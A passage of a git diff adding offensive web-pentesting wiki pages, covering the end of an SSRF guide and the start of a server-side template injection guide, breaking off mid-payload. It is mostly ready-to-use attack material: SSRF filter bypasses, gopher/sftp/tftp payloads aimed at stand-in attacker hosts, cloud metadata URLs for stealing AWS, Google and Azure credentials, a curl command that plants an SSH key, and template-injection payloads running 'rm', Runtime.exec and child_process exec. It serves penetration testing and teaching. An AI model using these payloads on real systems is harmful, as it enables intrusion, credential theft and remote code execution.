+spoofed.burpcollaborator.net = 127.0.0.1
+```
+
+### Other bypasses
+
+```bash
+## Malformed URLs and rare addresses
+localhost:+11211aaa
+localhost:00011211aaaa
+http://0/
+http://127.1
+http://127.0.1
+
+## Tricks
+http://1.1.1.1 &@2.2.2.2# @3.3.3.3/
+urllib2 : 1.1.1.1
+requests + browsers : 2.2.2.2
+urllib : 3.3.3.3
+filter_var() php function: 0://evil.com:80;http://google.com:80/
+
+## Weakparser
+http://127.1.1.1:80\@127.2.2.2:80/
+http://127.1.1.1:80\@@127.2.2.2:80/
+http://127.1.1.1:80:\@@127.2.2.2:80/
+http://127.1.1.1:80#\@127.2.2.2:80/
+```
+
+### [More Domain format Bypasses](open-redirect.md#more-domain-bypasses)
+
+### Bypass domain regexp
+
+[**Go to the proposed bypasses for Referer header in CSRF**](csrf-cross-site-request-forgery.md#referer)\*\*\*\*
+
+### Bypass via open redirect
+
+If the server is correctly protected you could **bypass all the restrictions by exploiting an Open Redirect inside the web page**. Because the webpage will allow **SSRF to the same domain** and probably will **follow redirects**, you can exploit the **Open Redirect to make the server to access internal any resource**.  
+Read more here: [https://portswigger.net/web-security/ssrf](https://portswigger.net/web-security/ssrf)
+
+## SSRF via Referrer header
+
+Some applications employ server-side analytics software that tracks visitors. This software often logs the Referrer header in requests, since this is of particular interest for tracking incoming links. Often the analytics software will actually visit any third-party URL that appears in the Referrer header. This is typically done to analyze the contents of referring sites, including the anchor text that is used in the incoming links. As a result, the Referer header often represents fruitful attack surface for SSRF vulnerabilities.  
+To discover this kind of "hidden" vulnerabilities you could use the plugin "**Collaborator Everywhere**" from Burp.
+
+## Server browser enumeration
+
+You can use applications like [http://webhook.site](http://webhook.site/) to find which browser is being used.
+
+## Exploitation
+
+### [Wget file upload](file-upload.md#wget-file-upload-ssrf-trick)
+
+### file://
+
+```text
+file:///etc/passwd
+```
+
+### dict://
+
+The DICT URL scheme is used to refer to definitions or word lists available using the DICT protocol:
+
+```text
+dict://<user>;<auth>@<host>:<port>/d:<word>:<database>:<n>
+ssrf.php?url=dict://attacker:11111/
+```
+
+### SFTP://
+
+A network protocol used for secure file transfer over secure shell
+
+```text
+ssrf.php?url=sftp://evil.com:11111/
+```
+
+### TFTP://
+
+Trivial File Transfer Protocol, works over UDP
+
+```text
+ssrf.php?url=tftp://evil.com:12346/TESTUDPPACKET
+```
+
+### LDAP://
+
+Lightweight Directory Access Protocol. It is an application protocol used over an IP network to manage and access the distributed directory information service.
+
+```text
+ssrf.php?url=ldap://localhost:11211/%0astats%0aquit
+```
+
+### Gopher://
+
+Using this protocol you can specify the **ip, port and bytes** you want the listener to **send**. Then, you can basically exploit a SSRF to **communicate with any TCP server** \(but you need to know how to talk to the service first\).  
+Fortunately, you can use [https://github.com/tarunkant/Gopherus](https://github.com/tarunkant/Gopherus) to already create payloads for several services.
+
+#### Gopher smtp 
+
+```text
+ssrf.php?url=gopher://127.0.0.1:25/xHELO%20localhost%250d%250aMAIL%20FROM%3A%3Chacker@site.com%3E%250d%250aRCPT%20TO%3A%3Cvictim@site.com%3E%250d%250aDATA%250d%250aFrom%3A%20%5BHacker%5D%20%3Chacker@site.com%3E%250d%250aTo%3A%20%3Cvictime@site.com%3E%250d%250aDate%3A%20Tue%2C%2015%20Sep%202017%2017%3A20%3A26%20-0400%250d%250aSubject%3A%20AH%20AH%20AH%250d%250a%250d%250aYou%20didn%27t%20say%20the%20magic%20word%20%21%250d%250a%250d%250a%250d%250a.%250d%250aQUIT%250d%250a
+will make a request like
+HELO localhost
+MAIL FROM:<hacker@site.com>
+RCPT TO:<victim@site.com>
+DATA
+From: [Hacker] <hacker@site.com>
+To: <victime@site.com>
+Date: Tue, 15 Sep 2017 17:20:26 -0400
+Subject: Ah Ah AHYou didn't say the magic word !
+.
+QUIT
+```
+
+#### Gopher HTTP
+
+```text
+gopher://<proxyserver>:8080/_GET http://<attacker:80>/x HTTP/1.1%0A%0A
+gopher://<proxyserver>:8080/_POST%20http://<attacker>:80/x%20HTTP/1.1%0ACookie:%20eatme%0A%0AI+am+a+post+body
+```
+
+#### Gopher SMTP — Back connect to 1337
+
+{% code title="redirect.php" %}
+```php
+<?php
+header("Location: gopher://hack3r.site:1337/_SSRF%0ATest!");
+?>Now query it.
+https://example.com/?q=http://evil.com/redirect.php.
+```
+{% endcode %}
+
+### SMTP
+
+From [https://twitter.com/har1sec/status/1182255952055164929](https://twitter.com/har1sec/status/1182255952055164929):  
+1. connect with SSRF on smtp localhost:25   
+2. from the first line get the internal domain name 220[ http://blabla.internaldomain.com ](https://t.co/Ad49NBb7xy) ESMTP Sendmail   
+3. search[ http://internaldomain.com ](https://t.co/K0mHR0SPVH) on github, find subdomains   
+4. connect
+
+### Exploiting PDFs Rendering
+
+If the web page is automatically creating a PDF with some information you have provided, you can **insert some JS that will be executed by the PDF creator** itself \(the server\) while creating the PDF and you will be able to abuse a SSRF. [**Find more information here.**](xss-cross-site-scripting/server-side-xss-dynamic-pdf.md)\*\*\*\*
+
+### From SSRF to DoS
+
+Create several sessions and try to download heavy files exploiting the SSRF from the sessions.
+
+## Exploitation in Cloud
+
+### Abusing SSRF in AWS EC2 environment
+
+#### 169.254.169.254 - Metadata Address
+
+**Metadata** of the  basic virtual machines from AWS \(called EC2\) can be retrieved from the VM accessing the url: `http://169.254.169.254` \([information about the metadata here](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html)\).
+
+The IP address 169.254.169.254 is a magic IP in the cloud world. AWS, Azure, Google, DigitalOcean and others use this to allow cloud resources to find out metadata about themselves. Some, such as Google, have additional constraints on the requests, such as requiring it to use `Metadata-Flavor: Google` as an HTTP header and refusing requests with an `X-Forwarded-For` header. **AWS has no constraints**.
+
+Sending a GET requests to the following endpoint will **dump a list of roles** that are attached to the current EC2 instance:
+
+```text
+http://169.254.169.254/latest/meta-data/iam/security-credentials/
+```
+
+If you want to access your S3 bucket you would normally hard-code your API keys into your application. Hard-coding clear text passwords is a bad idea. This is why you can assign your EC2 instance a role which can be used to access your S3 bucket. These credentials are automatically rotated by AWS and can be access thought the metadata API.
+
+Once you get a list of roles attached to the EC2 instance you can **dump their credentials** by making a GET requests to the following URL:
+
+```text
+http://169.254.169.254/latest/meta-data/iam/security-credentials/<ROLE_NAME_HERE>
+```
+
+As an example you can visit: [http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/iam/security-credentials/flaws](http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/iam/security-credentials/flaws)
+
+The response should look something like this:
+
+```text
+{
+  "Code" : "Success",
+  "LastUpdated" : "2019-08-03T20:42:03Z",
+  "Type" : "AWS-HMAC",
+  "AccessKeyId" : "ASIA5A6IYGGDLBWIFH5UQ",
+  "SecretAccessKey" : "sMX7//Ni2tu2hJua/fOXGfrapiq9PbyakBcJunpyR",
+  "Token" : "AgoJb3JpZ2luX2VjEH0aCXVzLWVhc3QtMSJHMEUCIQDFoFMUFs+lth0JM2lEddR/8LRHwdB4HiT1MBpEg8d+EAIgCKqMjkjdET/XjgYGDf9/eoNh1+5Xo/tnmDXeDE+3eKIq4wMI9v//////////ARAAGgw4OTUzODQ4MTU4MzAiDEF3/SQw0vAVzHKrgCq3A84uZvhGAswagrFjgrWAvIj4cJd6eI5Gcje09FyfRPmALKJymfQgpTQN9TtC/sBhIyICfni8JJvGesQZGi9c0ZFIWqdlmM/2rdZ6GaqcZY9V+0LspbwiDK0FUjrRcquBVswSlxWs8Tr0Uhpka20mUQOBhovmVyXNzyTQUQnBE9qgFLbYY+t86yUXmXMXxGPd4sWuLgkoCF2iPlMkgUwZq8hZvoiVf7TVQU32sgstKN7ozJiJcgTBpa6/batscGBtNpck4LOvHzNwwYv/FuVkpC70bPhqNXVxMEcpwt4s7RkHHowdFlNpnPpm57dfAYwZwoklWJdvtqFQ0tZHusZ65vJqyk5cZ8f3P/Cf7UlzoZPsIsarWcgfiDvkQliU9fY6Brt7jyjrF5h7oJbW/LUS4R9SDp+qKMtUY2JmLZRovsW4GfhfLJWv7wrW81QZVC8rBKLzWFRTLRkhlTFsS7A5JscuKoORyDxGQq/pGRsE30effdS9G1xNmzKwn45/V0XsilhTE7pOJGGopuLfBo5KD46hVS9v1iBuvxrVxsHFz7mnD/GKiwi1hbFAKEvypagZ28qEJaarNvAdi2QOowjuOX6gU6tAFrfFVBb6ZTI4btIjHNNoT0TFW5iYD0dkD+csqC4nTVpnAG/FFBk+CAHdy5Gh/aBISO7OQF9xKJSXkd+Syf62pg5XiMseL3n2+2+IWdDgKwhZYxeVlMbX88QYX3P9sX+OWHWidAVgTQhZw3xJ+VBV33EKgJ4b8Bk6mgo0kiB1hnoN0KX8RXr1axpYnJv2GHb8h/det89iwpyk77+8YcEvRc+DGTLIcUIxDoirgck9bpP3EBXfs=",
+  "Expiration" : "2019-08-04T03:16:50Z"
+}
+```
+
+You can then take **those credentials and use them with the AWS CLI**. This will allow you to do **anything that role has permissions** to do. If the role has improper permissions set \(Most likely\) you will be able to do all kinds of things, you might even be able to take over their entire cloud network.
+
+To take advantage of the new credentials, you will need to crate a new AWS profile like this one:
+
+```text
+[profilename]
+aws_access_key_id = ASIA6GG7PSQG4TCGYYOU
+aws_secret_access_key = a5kssI2I4H/atUZOwBr5Vpggd9CxiT5pUkyPJsjC
+aws_session_token = AgoJb3JpZ2luX2VjEGcaCXVzLXdlc3QtMiJHMEUCIHgCnKJl8fwc+0iaa6n4FsgtWaIikf5mSSoMIWsUGMb1AiEAlOiY0zQ31XapsIjJwgEXhBIW3u/XOfZJTrvdNe4rbFwq2gMIYBAAGgw5NzU0MjYyNjIwMjkiDCvj4qbZSIiiBUtrIiq3A8IfXmTcebRDxJ9BGjNwLbOYDlbQYXBIegzliUez3P/fQxD3qDr+SNFg9w6WkgmDZtjei6YzOc/a9TWgIzCPQAWkn6BlXufS+zm4aVtcgvBKyu4F432AuT4Wuq7zrRc+42m3Z9InIM0BuJtzLkzzbBPfZAz81eSXumPdid6G/4v+o/VxI3OrayZVT2+fB34cKujEOnBwgEd6xUGUcFWb52+jlIbs8RzVIK/xHVoZvYpY6KlmLOakx/mOyz1tb0Z204NZPJ7rj9mHk+cX/G0BnYGIf8ZA2pyBdQyVbb1EzV0U+IPlI+nkIgYCrwTCXUOYbm66lj90frIYG0x2qI7HtaKKbRM5pcGkiYkUAUvA3LpUW6LVn365h0uIbYbVJqSAtjxUN9o0hbQD/W9Y6ZM0WoLSQhYt4jzZiWi00owZJjKHbBaQV6RFwn5mCD+OybS8Y1dn2lqqJgY2U78sONvhfewiohPNouW9IQ7nPln3G/dkucQARa/eM/AC1zxLu5nt7QY8R2x9FzmKYGLh6sBoNO1HXGzSQlDdQE17clcP+hrP/m49MW3nq/A7WHIczuzpn4zv3KICLPIw2uSc7QU6tAEln14bV0oHtHxqC6LBnfhx8yaD9C71j8XbDrfXOEwdOy2hdK0M/AJ3CVe/mtxf96Z6UpqVLPrsLrb1TYTEWCH7yleN0i9koRQDRnjntvRuLmH2ERWLtJFgRU2MWqDNCf2QHWn+j9tYNKQVVwHs3i8paEPyB45MLdFKJg6Ir+Xzl2ojb6qLGirjw8gPufeCM19VbpeLPliYeKsrkrnXWO0o9aImv8cvIzQ8aS1ihqOtkedkAsw=
+```
+
+Notice the **aws\_session\_token**, this is indispensable for the profile to work.  
+Information taken from: [http://ghostlulz.com/ssrf-aws-credentials/](http://ghostlulz.com/ssrf-aws-credentials/) \(read that post for further information\).  
+Another possible interesting place where you can find credentials is in[ http://169.254.169.254/user-data](%20http://169.254.169.254/user-data)
+
+[**PACU**](https://github.com/RhinoSecurityLabs/pacu) ****can be used with the discovered credentials to find out your privileges and try to escalate privileges
+
+### SSRF in AWS ECS \(Container Service\) credentials
+
+**ECS**, is a logical group of EC2 instances on which you can run an application without having to scale your own cluster management infrastructure because ECS manages that for you. If you manage to compromise service running in **ECS**, the **metadata endpoints change**.
+
+If you access _**http://169.254.170.2/v2/credentials/&lt;GUID&gt;**_ you will find the credentials of the ECS machine. But first you need to **find the** _**&lt;GUID&gt;**_ . To find the &lt;GUID&gt; you need to read the **environ** variable _**AWS\_CONTAINER\_CREDENTIALS\_RELATIVE\_URI**_  inside the machine.   
+You could be able to read it exploiting an **Path Traversal** to _file:///proc/self/environ_  
+The mentioned http address should give you the **AccessKey, SecretKey and token**.
+
+### SSRF URL for AWS Elastic Beanstalk <a id="6f97"></a>
+
+We retrieve the `accountId` and `region` from the API.
+
+```text
+http://169.254.169.254/latest/dynamic/instance-identity/document
+http://169.254.169.254/latest/meta-data/iam/security-credentials/aws-elasticbeanorastalk-ec2-role
+```
+
+We then retrieve the `AccessKeyId`, `SecretAccessKey`, and `Token` from the API.
+
+```text
+http://169.254.169.254/latest/meta-data/iam/security-credentials/aws-elasticbeanorastalk-ec2-role
+```
+
+![](https://miro.medium.com/max/60/0*4OG-tRUNhpBK96cL?q=20)![](https://miro.medium.com/max/1469/0*4OG-tRUNhpBK96cL)
+
+Then we use the credentials with `aws s3 ls s3://elasticbeanstalk-us-east-2-[ACCOUNT_ID]/`.
+
+### SSRF URL for Google Cloud <a id="6440"></a>
+
+Requires the header “Metadata-Flavor: Google” or “X-Google-Metadata-Request: True”
+
+```text
+http://169.254.169.254/computeMetadata/v1/
+http://metadata.google.internal/computeMetadata/v1/
+http://metadata/computeMetadata/v1/
+http://metadata.google.internal/computeMetadata/v1/instance/hostname
+http://metadata.google.internal/computeMetadata/v1/instance/id
+http://metadata.google.internal/computeMetadata/v1/project/project-id
+```
+
+Google allows recursive pulls
+
+```text
+http://metadata.google.internal/computeMetadata/v1/instance/disks/?recursive=true
+```
+
+Beta does NOT require a header atm \(thanks Mathias Karlsson @avlidienbrunn\)
+
+```text
+http://metadata.google.internal/computeMetadata/v1beta1/
+http://metadata.google.internal/computeMetadata/v1beta1/?recursive=true
+```
+
+Interesting files to pull out:
+
+* SSH Public Key : [`http://metadata.google.internal/computeMetadata/v1beta1/project/attributes/ssh-keys?alt=json`](http://metadata.google.internal/computeMetadata/v1beta1/project/attributes/ssh-keys?alt=json)
+* Get Access Token : [`http://metadata.google.internal/computeMetadata/v1beta1/instance/service-accounts/default/token`](http://metadata.google.internal/computeMetadata/v1beta1/instance/service-accounts/default/token)
+* Kubernetes Key : [`http://metadata.google.internal/computeMetadata/v1beta1/instance/attributes/kube-env?alt=json`](http://metadata.google.internal/computeMetadata/v1beta1/instance/attributes/kube-env?alt=json)
+
+### Add an SSH key <a id="3e24"></a>
+
+Extract the token
+
+```text
+http://metadata.google.internal/computeMetadata/v1beta1/instance/service-accounts/default/token?alt=json
+```
+
+Check the scope of the token
+
+```text
+$ curl https://www.googleapis.com/oauth2/v1/tokeninfo?access_token=ya29.XXXXXKuXXXXXXXkGT0rJSA  { 
+        "issued_to": "101302079XXXXX", 
+        "audience": "10130207XXXXX", 
+        "scope": "https://www.googleapis.com/auth/compute https://www.googleapis.com/auth/logging.write https://www.googleapis.com/auth/devstorage.read_write https://www.googleapis.com/auth/monitoring", 
+        "expires_in": 2443, 
+        "access_type": "offline" 
+}
+```
+
+Now push the SSH key.
+
+```text
+curl -X POST "https://www.googleapis.com/compute/v1/projects/1042377752888/setCommonInstanceMetadata" 
+-H "Authorization: Bearer ya29.c.EmKeBq9XI09_1HK1XXXXXXXXT0rJSA" 
+-H "Content-Type: application/json" 
+--data '{"items": [{"key": "sshkeyname", "value": "sshkeyvalue"}]}'
+```
+
+### SSRF URL for Digital Ocean <a id="9f1f"></a>
+
+Documentation available at [`https://developers.digitalocean.com/documentation/metadata/`](https://developers.digitalocean.com/documentation/metadata/)
+
+```text
+curl http://169.254.169.254/metadata/v1/id
+http://169.254.169.254/metadata/v1.json
+http://169.254.169.254/metadata/v1/ 
+http://169.254.169.254/metadata/v1/id
+http://169.254.169.254/metadata/v1/user-data
+http://169.254.169.254/metadata/v1/hostname
+http://169.254.169.254/metadata/v1/region
+http://169.254.169.254/metadata/v1/interfaces/public/0/ipv6/addressAll in one request:
+curl http://169.254.169.254/metadata/v1.json | jq
+```
+
+### SSRF URL for Packetcloud <a id="2af0"></a>
+
+Documentation available at [`https://metadata.packet.net/userdata`](https://metadata.packet.net/userdata)
+
+### SSRF URL for Azure <a id="cea8"></a>
+
+Limited, maybe more exists? [`https://azure.microsoft.com/en-us/blog/what-just-happened-to-my-vm-in-vm-metadata-service/`](https://azure.microsoft.com/en-us/blog/what-just-happened-to-my-vm-in-vm-metadata-service/)
+
+[http://169.254.169.254/metadata/v1/maintenance](http://169.254.169.254/metadata/v1/maintenance)
+
+Update Apr 2017, Azure has more support; requires the header “Metadata: true” [`https://docs.microsoft.com/en-us/azure/virtual-machines/windows/instance-metadata-service`](https://docs.microsoft.com/en-us/azure/virtual-machines/windows/instance-metadata-service)
+
+```text
+http://169.254.169.254/metadata/instance?api-version=2017-04-02
+http://169.254.169.254/metadata/instance/network/interface/0/ipv4/ipAddress/0/publicIpAddress?api-version=2017-04-02&format=text
+```
+
+### SSRF URL for OpenStack/RackSpace <a id="2ffc"></a>
+
+\(header required? unknown\)
+
+```text
+http://169.254.169.254/openstack
+```
+
+### SSRF URL for HP Helion <a id="a8e0"></a>
+
+\(header required? unknown\)
+
+```text
+http://169.254.169.254/2009-04-04/meta-data/
+```
+
+### SSRF URL for Oracle Cloud <a id="a723"></a>
+
+```text
+http://192.0.0.192/latest/
+http://192.0.0.192/latest/user-data/
+http://192.0.0.192/latest/meta-data/
+http://192.0.0.192/latest/attributes/
+```
+
+### SSRF URL for Alibaba <a id="51bd"></a>
+
+```text
+http://100.100.100.200/latest/meta-data/
+http://100.100.100.200/latest/meta-data/instance-id
+http://100.100.100.200/latest/meta-data/image-id
+```
+
+### SSRF URL for Kubernetes ETCD <a id="c80a"></a>
+
+Can contain API keys and internal ip and ports
+
+```text
+curl -L http://127.0.0.1:2379/version
+curl http://127.0.0.1:2379/v2/keys/?recursive=true
+```
+
+### SSRF URL for Docker <a id="ac0b"></a>
+
+```text
+http://127.0.0.1:2375/v1.24/containers/jsonSimple example
+docker run -ti -v /var/run/docker.sock:/var/run/docker.sock bash
+bash-4.4# curl --unix-socket /var/run/docker.sock http://foo/containers/json
+bash-4.4# curl --unix-socket /var/run/docker.sock http://foo/images/json
+```
+
+### SSRF URL for Rancher <a id="8cb7"></a>
+
+```text
+curl http://rancher-metadata/<version>/<path>
+```
+
+## Blind SSRF
+
+The difference between a blind SSRF and a not blind one is that in the blind you cannot see the response of the SSRF request. Then, it is more difficult to exploit because you will be able to exploit only well-known vulnerabilities.
+
+## Detect SSRF
+
+You can use [https://github.com/teknogeek/ssrf-sheriff](https://github.com/teknogeek/ssrf-sheriff) to create an HTTP server that will respond correctly to a lot of different requests \(GET, POST, PTU, DELETE, JSON, TXT, GIF, MP3...\).
+
+* [SSRFmap - https://github.com/swisskyrepo/SSRFmap](https://github.com/swisskyrepo/SSRFmap)
+* [Gopherus - https://github.com/tarunkant/Gopherus](https://github.com/tarunkant/Gopherus)
+
+## To practice
+
+{% embed url="https://github.com/incredibleindishell/SSRF\_Vulnerable\_Lab" %}
+
+## References
+
+* [https://medium.com/@pravinponnusamy/ssrf-payloads-f09b2a86a8b4](https://medium.com/@pravinponnusamy/ssrf-payloads-f09b2a86a8b4)
+* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Request%20Forgery](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Request%20Forgery)
+
+
+
diff --git a/pentesting-web/ssti-server-side-template-injection.md b/pentesting-web/ssti-server-side-template-injection.md
new file mode 100644
index 00000000..2d072def
--- /dev/null
+++ b/pentesting-web/ssti-server-side-template-injection.md
@@ -0,0 +1,289 @@
+# SSTI \(Server Side Template Injection\)
+
+**This guide is based on the one of Portswigger:** [**https://portswigger.net/web-security/server-side-template-injection**](https://portswigger.net/web-security/server-side-template-injection)\*\*\*\*
+
+## What is server-side template injection?
+
+A server-side template injection occurs when an attacker is able to use native template syntax to inject a malicious payload into a template, which is then executed server-side.
+
+**Template engines** are designed to **generate web** pages by **combining** **fixed** templates with **volatile** data. Server-side template injection attacks can occur when **user input** is concatenated directly **into a template**, rather than passed in as data. This allows attackers to **inject arbitrary template directives** in order to manipulate the template engine, often enabling them to take **complete control of the server**.
+
+An example of vulnerable code see the following one:
+
+```php
+$output = $twig->render("Dear " . $_GET['name']);
+```
+
+In the previous example **part of the template** itself is being **dynamically generated** using the `GET` parameter `name`. As template syntax is evaluated server-side, this potentially allows an attacker to place a server-side template injection payload inside the `name` parameter as follows:
+
+```text
+http://vulnerable-website.com/?name={{bad-stuff-here}}
+```
+
+## Constructing a server-side template injection attack
+
+![](../.gitbook/assets/ssti-methodology-diagram.png)
+
+### Detect
+
+As with any vulnerability, the first step towards exploitation is being able to find it. Perhaps the simplest initial approach is to try **fuzzing the template** by injecting a sequence of special characters commonly used in template expressions, such as the polyglot `${{<%[%'"}}%\`.  
+In order to check if the server is vulnerable you should **spot the differences** between the response with **regular data** on the parameter and the **given payload**.  
+If an **error is thrown** it will be quiet easy to figure out that **the server is vulnerable** and even which **engine is running**. But you could also find a vulnerable server if you were **expecting** it to **reflect** the given payload and it is **not being reflected** or if there are some **missing chars** in the response.
+
+#### Detect - Plaintext context
+
+The given input is being **rendered and reflected** into the response. This is easily **mistaken for a simple** [**XSS**](xss-cross-site-scripting/) vulnerability, but it's easy to difference if you try set **mathematical operations** within a template expression:
+
+```text
+{{7*7}}
+${7*7}
+<%= 7*7 %>
+```
+
+#### Detect - Code context
+
+In these cases the **user input** is being placed **within** a **template expression**:
+
+```python
+engine.render("Hello {{"+greeting+"}}", data)
+```
+
+The URL access that page could be similar to: `http://vulnerable-website.com/?greeting=data.username`
+
+If you **change** the **`greeting`** parameter for a **different value** the **response won't contain the username**, but if you access something like: `http://vulnerable-website.com/?greeting=data.username}}hello` then, **the response will contain the username** \(if the closing template expression chars were **`}}`**\).  
+If an **error** is thrown during these test, it will be easier to find that the server is vulnerable.
+
+### Identify
+
+Once you have detected the template injection potential, the next step is to identify the template engine.  
+Although there are a huge number of templating languages, many of them use very similar syntax that is specifically chosen not to clash with HTML characters.
+
+If you are lucky the server will be **printing the errors** and you will be able to find the **engine** used **inside** the errors. Some possible payloads that may cause errors:
+
+| `${}` | `{{}}` | `<%= %>` |
+| :--- | :--- | :--- |
+| `${7/0}` | `{{7/0}}` | `<%= 7/0 %>` |
+| `${foobar}` | `{{foobar}}` | `<%= foobar %>` |
+| `${7*7}` | `{{7*7}}` | \`\` |
+
+Otherwise, you'll need to manually **test different language-specific payloads** and study how they are interpreted by the template engine. A common way of doing this is to inject arbitrary mathematical operations using syntax from different template engines. You can then observe whether they are successfully evaluated. To help with this process, you can use a decision tree similar to the following:
+
+![](../.gitbook/assets/image%20%289%29.png)
+
+
+
+### Exploit 
+
+#### Read
+
+The first step after finding template injection and identifying the template engine is to read the documentation. Key areas of interest are:
+
+* 'For Template Authors' sections covering basic syntax.
+* 'Security Considerations' - chances are whoever developed the app you're testing didn't read this, and it may contain some useful hints.
+* Lists of builtin methods, functions, filters, and variables.
+* Lists of extensions/plugins - some may be enabled by default.
+
+#### Explore
+
+Assuming no exploits have presented themselves, the next step is to **explore the environment** to find out exactly what **you have access to**. You can expect to find both **default objects** provided by the template engine, and **application-specific objects** passed in to the template by the developer. Many template systems expose a 'self' or namespace object containing everything in scope, and an idiomatic way to list an object's attributes and methods.
+
+If there's no builtin self object you're going to have to bruteforce variable names using [SecLists](https://github.com/danielmiessler/SecLists/blob/25d4ac447efb9e50b640649f1a09023e280e5c9c/Discovery/Web-Content/burp-parameter-names.txt) and Burp Intruder's wordlist collection.
+
+Developer-supplied objects are particularly likely to contain sensitive information, and may vary between different templates within an application, so this process should ideally be applied to every distinct template individually.
+
+#### **Attack**
+
+At this point you should have a **firm idea of the attack surface available** to you and be able to proceed with traditional security audit techniques, reviewing each function for exploitable vulnerabilities. It's important to approach this in the context of the wider application - some functions can be used to exploit application-specific features. The examples to follow will use template injection to trigger arbitrary object creation, arbitrary file read/write, remote file include, information disclosure and privilege escalation vulnerabilities.
+
+## Exploits
+
+### FreeMarker \(Java\)
+
+* `{{7*7}} = {{7*7}}`
+* `${7*7} = 49`
+* `${7*'7'} Nothing`
+* `${foobar}`
+
+```text
+<#assign ex="freemarker.template.utility.Execute"?new()> ${ ex("rm /home/carlos/morale.txt") }
+${product.getClass().getProtectionDomain().getCodeSource().getLocation().toURI().resolve('/home/carlos/my_password.txt').toURL().openStream().readAllBytes()?join(" ")}
+```
+
+#### More information
+
+* In FreeMarker section of [https://portswigger.net/research/server-side-template-injection](https://portswigger.net/research/server-side-template-injection)
+* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection\#freemarker](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#freemarker)
+
+### Velocity \(Java\)
+
+#### More information
+
+* In Velocity section of [https://portswigger.net/research/server-side-template-injection](https://portswigger.net/research/server-side-template-injection)
+* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection\#velocity](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#velocity)
+
+### Thymeleaf \(Java\)
+
+The typical test expression for SSTI is `${7*7}`. This expression works in Thymeleaf, too. If you want to achieve remote code execution, you can use one of the following test expressions:
+
+* SpringEL: `${T(java.lang.Runtime).getRuntime().exec('calc')}`
+* OGNL: `${#rt = @java.lang.Runtime@getRuntime(),#rt.exec("calc")}`
+
+However, as we mentioned before, expressions only work in special Thymeleaf attributes. If it’s necessary to use an expression in a different location in the template, Thymeleaf supports _expression inlining_. To use this feature, you must put an expression within `[[...]]` or `[(...)]` \(select one or the other depending on whether you need to escape special symbols\). Therefore, a simple SSTI detection payload for Thymeleaf would be `[[${7*7}]]`.
+
+Chances that the above detection payload would work are, however, very low. SSTI vulnerabilities usually happen when a template is dynamically generated in the code. Thymeleaf, by default, doesn’t allow such dynamically generated templates and all templates must be created earlier. Therefore, if a developer wants to create a template from a string _on the fly_, they would need to create their own TemplateResolver. This is possible but happens very rarely.
+
+If we take a deeper look into the documentation of the Thymeleaf template engine, we will find an interesting feature called _**expression preprocessing**_. Expressions placed between double underscores \(`__...__`\) are preprocessed and the result of the preprocessing is used as part of the expression during regular processing. Here is an official example from Thymeleaf documentation:
+
+```text
+#{selection.__${sel.code}__}
+```
+
+#### Vulnerable example
+
+```markup
+<a th:href="@{__${path}__}" th:title="${title}">
+
+http://localhost:8082/(7*7)
+http://localhost:8082/(${T(java.lang.Runtime).getRuntime().exec('calc')})
+```
+
+#### More information
+
+* [https://www.acunetix.com/blog/web-security-zone/exploiting-ssti-in-thymeleaf/](https://www.acunetix.com/blog/web-security-zone/exploiting-ssti-in-thymeleaf/)
+
+### Smarty \(PHP\)
+
+#### More information
+
+* In Smarty section of [https://portswigger.net/research/server-side-template-injection](https://portswigger.net/research/server-side-template-injection)
+* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection\#smarty](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#smarty)
+
+### Twig \(PHP\)
+
+* `{{7*7}} = 49`
+* `${7*7} = ${7*7}`
+* `{{7*'7'}} = 49`
+* `{{1/0}} = Error`
+* `{{foobar}} Nothing`
+
+#### More information
+
+* In Twig and Twig \(Sandboxed\) section of [https://portswigger.net/research/server-side-template-injection](https://portswigger.net/research/server-side-template-injection)
+* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection\#twig](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#twig)
+
+### Jade \(NodeJS\)
+
+#### More information
+
+* In Jade section of [https://portswigger.net/research/server-side-template-injection](https://portswigger.net/research/server-side-template-injection)
+* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection\#jade--codepen](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#jade--codepen)
+
+### Handlebars \(NodeJS\)
+
+* {{7\*7}} = Error
+* ${7\*7} = ${7\*7}
+* {{foobar}} Nothing
+
+```text
+wrtz{{#with "s" as |string|}}
+  {{#with "e"}}
+    {{#with split as |conslist|}}
+      {{this.pop}}
+      {{this.push (lookup string.sub "constructor")}}
+      {{this.pop}}
+      {{#with string.split as |codelist|}}
+        {{this.pop}}
+        {{this.push "return require('child_process').exec('whoami');"}}
+        {{this.pop}}
+        {{#each conslist}}
+          {{#with (string.sub.apply 0 codelist)}}
+            {{this}}
+          {{/with}}
+        {{/each}}
+      {{/with}}
+    {{/with}}
+  {{/with}}
+{{/with}}
+
+URLencoded:
